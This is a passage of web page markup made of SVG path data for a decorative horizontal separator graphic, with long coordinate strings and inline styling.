d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 